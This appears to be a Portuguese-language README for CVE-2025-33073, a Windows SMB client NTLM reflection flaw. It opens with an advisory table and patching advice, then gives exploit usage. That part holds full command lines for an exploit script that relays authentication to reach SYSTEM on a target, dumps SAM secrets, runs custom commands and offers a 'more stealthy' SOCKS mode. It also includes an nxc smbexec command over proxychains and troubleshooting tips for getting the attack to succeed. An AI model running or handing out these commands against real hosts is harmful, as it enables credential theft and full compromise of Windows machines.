
CVE-2025-33073
🔥 Execução Remota de Código Autenticada de Alta Gravidade 🔥 Controle de Acesso Incorreto no Cliente SMB do Windows (CWE-284)
| Aspecto | Detalhes |
|---|
| Pontuação CVSS v3.1 | 8.8 (Alta) 🔥 |
| Sistemas Afetados | Windows 10, 11, Server 2012–2025 (todas as edições) 💻 |
| Data de Divulgação | 10 de junho de 2025 📅 (Corrigido na Patch Tuesday de junho de 2025) |
| Exploração | Ativamente explorado em ambientes reais 😱 Adicionado ao CISA KEV em 21 de outubro de 2025 |
| Vetor de Ataque | Rede (Autenticado) 🌐 |
| Impacto | Execução de código em nível de SYSTEM 👑 Movimento lateral via relay Kerberos |
| Contorno | Mitigações de reflexão NTLM ⚡ |
Atualize agora! 🔧
→ Aplique as atualizações da Microsoft (ex.: KB5060998)
→ Guia de Atualização da Microsoft 🔗
Habilite a Assinatura SMB ✍️
→ Imponha em todos os clientes e servidores
→ Set-SmbClientConfiguration -RequireSecuritySignature $true
Restrinja o NTLM 🚫
→ Bloqueie NTLM quando possível
→ Monitore tentativas de relay com ferramentas EDR
Correção automatizada? 🤖
→ Use Vicarius vRx ou scripts personalizados para remediação em massa
Status em 15 de novembro de 2025:
✅ Corrigido
❌ Ainda explorado em sistemas sem atualização
🔔 Prazo CISA: 10 de novembro de 2025 ⏰
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

Comando personalizado Em vez de executar secretsdump, um comando personalizado pode ser executado.
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS Para execução mais furtiva de comandos após uma conexão válida como SYSTEM ter sido estabelecida. --target e --target-ip devem ser iguais aqui.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

Um comando personalizado também pode ser executado via proxychains em vez de despejar o SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Se você estiver no mesmo domínio de broadcast que o dispositivo e ele estiver vulnerável a envenenamento LLMNR, é possível explorar um dispositivo sem precisar registrar um registro DNS.

Às vezes o ataque não funciona porque o hostname é usado para o ataque, o que resulta em uma consulta DNS a partir do Kali. Se o Kali não estiver usando o servidor DNS ou você receber uma mensagem '/ FAILED' do impacket-ntlmrelayx, tente adicionar o host ao seu arquivo /etc/hosts. Isso deve fazer o ataque funcionar.
Se usar IP, o ataque deve funcionar. Às vezes, executá-lo várias vezes resulta em SUCCESS em vez de falha. Até agora não está perfeitamente claro por que isso acontece. Acho que tem algo a ver com rede.
Tente outro método de coerção usando -M ou --method.
A autenticação NTLM local ocorre

A autenticação NTLM local não ocorre, resultando em uma tentativa FAILED

Não espere — atualize hoje! 🛑
A segurança da sua rede depende disso. 💪